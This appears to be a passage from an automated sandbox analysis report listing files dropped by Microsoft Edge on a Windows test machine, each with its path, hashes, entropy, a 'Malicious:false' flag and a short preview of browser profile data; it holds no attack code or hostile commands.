                                                                                                                                                                Preview:...@..@...@.....C.].....@...............P...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".fglocg20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U?:K...G..>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.......y...... .2.......,...

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):280
                                                                                                                                                                Entropy (8bit):4.16517681506792
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
                                                                                                                                                                MD5:C847567DEE0317368C1EC824DE025887
                                                                                                                                                                SHA1:554098F22FEA9282FE1AAB35560849CD6FF546B1
                                                                                                                                                                SHA-256:3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
                                                                                                                                                                SHA-512:A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1bbca00c-38ec-467e-89a8-c9e645b84db5.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):35113
                                                                                                                                                                Entropy (8bit):5.555704209770109
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:iR2bPnpWP7Pf4h8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPhGXfrwIK0WuqKpQtuj:iR2bPnpWP7Pf4hu1ja+kXsIK0Wr1tE
                                                                                                                                                                MD5:4DA99C2332B3CB18AB31DBFF80EB9E77
                                                                                                                                                                SHA1:0F77BB1A1925E717C4BF499ADE5828FE1572D2C2
                                                                                                                                                                SHA-256:04C73F86469A3B2EB3A97424C9E18A480BF52E0516F00B9C11E146B01A1BF1F2
                                                                                                                                                                SHA-512:5CC6E48D9614601B23C60B87E0967164263FE7CBD019AC7B255C7E81385E28722221F1A516E6F325084E6036DFF4189A1F31C68D9869EAC24B570837C7D4600F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380903748127814","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380903748127814","location":5,"ma

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\4d5e96e1-7d5e-4c7b-a3a6-697369167932.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\59396461-0e3d-444d-8937-b33308876d25.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (17385), with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17385
                                                                                                                                                                Entropy (8bit):5.486499174778513
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:st/J99QTryDigabatSuypBsHsHyaNPjdjkcYCBAXx3uaqBp0B12s8IbV+FmWQwWe:st/PGKSu4BsMHtJjdGXpXqBpYXbGnQwN
                                                                                                                                                                MD5:E5388BD665D876C16B50EFE7BB7D3915
                                                                                                                                                                SHA1:366DA111AB66B70B2414658C902E52B4802D28D8
                                                                                                                                                                SHA-256:24EB588068E44DC591132915EA963D6451FC05BB983316CD59B52F13BCF75AC7
                                                                                                                                                                SHA-512:1EFF78A205ACB068929790B906DDE90DEFA4AEC87DBCB1F0927704754849B91DFA6B9C13F81D7DF8840585471654E1CED54ACDAEF30944E76734361C1078523F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380903748641376","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\60ccd022-32c6-4ed5-a2d9-91f38f75212c.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9104604c-2f7c-40d2-9e47-14f5f0911498.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40470
                                                                                                                                                                Entropy (8bit):5.560906285723253
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:iR2bP6H7pLGLhnpWP7Pfrh8F1+UoAYDCx9Tuqh0VfUC9xbog/OVSEihGXfrwIK08:iR2bP6BchnpWP7Pfrhu1jaXEikXsIK08
                                                                                                                                                                MD5:41DFF14DF0C379E65DF15F50EE0EF07B
                                                                                                                                                                SHA1:ADD1F4DF8E6C1D8CF8F94CEC5AFFB98B29876AED
                                                                                                                                                                SHA-256:293D26F9F875A669E0BEC45769022F869582AD2EB91BFC70814407480DDF8BF0
                                                                                                                                                                SHA-512:162C323D604FA48E82988FDCBDE2B45C576845BC715DC41388F13CBCFC5011144F1E85F63C9E86725B4F5FCF8D70BE22B0E310955192EE0022CD09E58A783FCC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380903748127814","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380903748127814","location":5,"ma

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):33
                                                                                                                                                                Entropy (8bit):3.5394429593752084
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...m.................DB_VERSION.1

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):313
                                                                                                                                                                Entropy (8bit):5.256535054457292
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvR1FR1cNwi23oH+Tcwtp3hBtB2KLl5vRrwQ+q2PcNwi23oH+Tcwtp3hBWsIF2:7h/ZYebp3dFLpwVvLZYebp3eFUv
                                                                                                                                                                MD5:3B094BBDBBDF197E8B028B87975DC3FB
                                                                                                                                                                SHA1:73417DF29BB9AC6445FF72891623B7D30E1CFC47
                                                                                                                                                                SHA-256:0C82791A9D3B8DC11A683B931F6BD43EAA288D7B3040EE840FB9374B8001FE8D
                                                                                                                                                                SHA-512:0A439EF23DD135A2E93680E5884B87A333DBACB94836FFF2B0CB3F95CC168FA6CBD9AC91D5A02EC0AA980F8B215AC3E84A5F462E69B2DABAB5FBC08B450711C5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:34.100 8b8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2025/01/09-08:42:34.124 8b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):41
                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):1696115
                                                                                                                                                                Entropy (8bit):5.04061995892176
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:krf76gGkISshcFdmcOAoPENUpifYP+MbI2T:krfgAmmE
                                                                                                                                                                MD5:19D48FDE29D2BCAA232830EEF9C501D2
                                                                                                                                                                SHA1:34513FA65FCA3DE8218C746A0029BA2FED3EBBB4
                                                                                                                                                                SHA-256:C506A8D682F7D5B85E6F3F007FC1C49EBAADBF2558AB62183C69697E8D49BD8D
                                                                                                                                                                SHA-512:417B84A577AE59E80CD51E0280666B89F2078B57B60DBA751994A83890BB2958D453CBB93CC2981B84AC3A194AA29C16BA12284F3AF883488BDF77A52D29E8FE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340965219355520.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):342
                                                                                                                                                                Entropy (8bit):5.138348861281795
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvROU8jN4q2PcNwi23oH+Tcwt9Eh1tIFUtJvRoMJZmwPvRrMDkwOcNwi23oH+8:7XvLZYeb9Eh16FUtoe/g54ZYeb9Eh1VJ
                                                                                                                                                                MD5:8C56ED736F9FE9282E20801DF6CE97BC
                                                                                                                                                                SHA1:784468A2CC9F7590BF6534113B1747F5BF35607C
                                                                                                                                                                SHA-256:0BCE4C010D0F9D405E5BF341E7555B1D68761F12C2213F01C9A0992939915F91
                                                                                                                                                                SHA-512:BD8FB98E716CCC1AAE0798181017E2B4521E79006699580EDE350E7685F5190AB8BBF681DB2AD69BC4570CF7B72A2088E245C6B0FD078EC62544BB9C738A716C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:34.212 1fd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/09-08:42:34.516 1fd0 Recovering log #3.2025/01/09-08:42:34.522 1fd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):342
                                                                                                                                                                Entropy (8bit):5.138348861281795
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvROU8jN4q2PcNwi23oH+Tcwt9Eh1tIFUtJvRoMJZmwPvRrMDkwOcNwi23oH+8:7XvLZYeb9Eh16FUtoe/g54ZYeb9Eh1VJ
                                                                                                                                                                MD5:8C56ED736F9FE9282E20801DF6CE97BC
                                                                                                                                                                SHA1:784468A2CC9F7590BF6534113B1747F5BF35607C
                                                                                                                                                                SHA-256:0BCE4C010D0F9D405E5BF341E7555B1D68761F12C2213F01C9A0992939915F91
                                                                                                                                                                SHA-512:BD8FB98E716CCC1AAE0798181017E2B4521E79006699580EDE350E7685F5190AB8BBF681DB2AD69BC4570CF7B72A2088E245C6B0FD078EC62544BB9C738A716C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:34.212 1fd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/09-08:42:34.516 1fd0 Recovering log #3.2025/01/09-08:42:34.522 1fd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                Entropy (8bit):0.4623003148432934
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBup6:TouQq3qh7z3bY2LNW9WMcUvBuQ
                                                                                                                                                                MD5:36941194B86933BEF948FACDAE65B45B
                                                                                                                                                                SHA1:0F440776FE06DF75AD887E553F783A6EC15D94B8
                                                                                                                                                                SHA-256:458FC34E9B8636037826A7F29B6F340252124FA82ADAD2C6B41BDBFC987A05C4
                                                                                                                                                                SHA-512:F9C6D9F5AD246F60926EE3E0B8C8EA43A35438ACBCF618E4AC32D17286732C4746971E4EE4ED1B3CC197EB1FE456E7DAB09FE204423536963F39E2ABD328C701
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):10240
                                                                                                                                                                Entropy (8bit):0.8708334089814068
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):354
                                                                                                                                                                Entropy (8bit):5.225258718422697
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvRglUdSQL+q2PcNwi23oH+TcwtnG2tMsIFUtJvRg+HG1ZmwPvRg+HQLVkwOcK:7Wl1vLZYebn9GFUtgF1/q154ZYebn95J
                                                                                                                                                                MD5:8C25F520F44647171FF64A7150DC4C4B
                                                                                                                                                                SHA1:9C10264A15530FE649236B861AD75DF60A9D0B87
                                                                                                                                                                SHA-256:B071D04A25F19EFAEA31CF62F4F8DDC9C3066621C099C67504EF624D4FE5D38C
                                                                                                                                                                SHA-512:5DACDDEC86274DC675F030658D459AC896EBBDB978939E9C92482E79401F181118618D216F21072A010787C91DF8E598D33DD53DE439D7DBA318DE1DF635F13C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.161 1838 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/09-08:42:28.162 1838 Recovering log #3.2025/01/09-08:42:28.162 1838 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):354
                                                                                                                                                                Entropy (8bit):5.225258718422697
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvRglUdSQL+q2PcNwi23oH+TcwtnG2tMsIFUtJvRg+HG1ZmwPvRg+HQLVkwOcK:7Wl1vLZYebn9GFUtgF1/q154ZYebn95J
                                                                                                                                                                MD5:8C25F520F44647171FF64A7150DC4C4B
                                                                                                                                                                SHA1:9C10264A15530FE649236B861AD75DF60A9D0B87
                                                                                                                                                                SHA-256:B071D04A25F19EFAEA31CF62F4F8DDC9C3066621C099C67504EF624D4FE5D38C
                                                                                                                                                                SHA-512:5DACDDEC86274DC675F030658D459AC896EBBDB978939E9C92482E79401F181118618D216F21072A010787C91DF8E598D33DD53DE439D7DBA318DE1DF635F13C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.161 1838 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/09-08:42:28.162 1838 Recovering log #3.2025/01/09-08:42:28.162 1838 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                Entropy (8bit):0.613323288685216
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jWMup3qmL:TO8D4jJ/6Up+qD
                                                                                                                                                                MD5:633E508C7C7CC747FF26B902FFC616AA
                                                                                                                                                                SHA1:D984EC7FA8DD9C278A0CFA4DE18B5B77F43C07A5
                                                                                                                                                                SHA-256:82512CAA7CBAD55BAA1A79A2C33AE1E23BB9AC386DD00CE69574EDC5A448386F
                                                                                                                                                                SHA-512:FEEC00A7E67C95E4EF69E4C1406D0E0603B724BEBDF2A80117E34CE66967F83F213E0791D1854AB1204A72624CCF92A0E4F59C7293C8F8419F0702A63977393F
                                                                                                                                                                Malicious:false
